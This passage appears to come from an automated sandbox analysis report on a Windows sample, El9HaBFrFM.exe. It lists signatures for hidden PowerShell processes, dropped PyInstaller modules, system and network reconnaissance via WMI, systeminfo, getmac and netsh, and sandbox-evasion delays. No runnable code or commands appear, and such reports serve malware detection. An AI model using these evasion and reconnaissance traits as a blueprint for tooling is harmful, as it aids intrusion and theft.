              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
              Source: C:\Users\user\AppData\Local\Temp\bound.exeMemory allocated: 26C52A20000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\bound.exeMemory allocated: 26C6C380000 memory reserve | memory write watch
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3804Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2962Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2899
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2881
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 474
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2431
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1351
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1349
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1075
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 406
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2078
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\_decimal.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.dllJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\python313.dllJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17529
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeAPI coverage: 4.9 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8168Thread sleep count: 3804 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7328Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5076Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8156Thread sleep count: 2962 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2304Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152Thread sleep count: 2899 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4852Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2496Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 8008Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8140Thread sleep count: 2881 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8196Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3604Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8256Thread sleep count: 474 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8352Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8296Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8912Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8880Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 8400Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996Thread sleep count: 1351 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2872Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8300Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788Thread sleep count: 1349 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3668Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2920Thread sleep count: 1075 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7220Thread sleep count: 406 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2836Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6612Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8288Thread sleep count: 2078 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2060Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8288Thread sleep count: 92 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5272Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3A83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6BA3A83C0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3A9280 FindFirstFileExW,FindClose,0_2_00007FF6BA3A9280
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3C1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6BA3C1874
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3A9280 FindFirstFileExW,FindClose,1_2_00007FF6BA3A9280
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3A83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF6BA3A83C0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3C1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF6BA3C1874
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EF46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,83_2_00007FF6D7EF46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EEE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,83_2_00007FF6D7EEE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F388E0 FindFirstFileExA,83_2_00007FF6D7F388E0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFB0D1230 GetSystemInfo,1_2_00007FFDFB0D1230
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 922337203685477
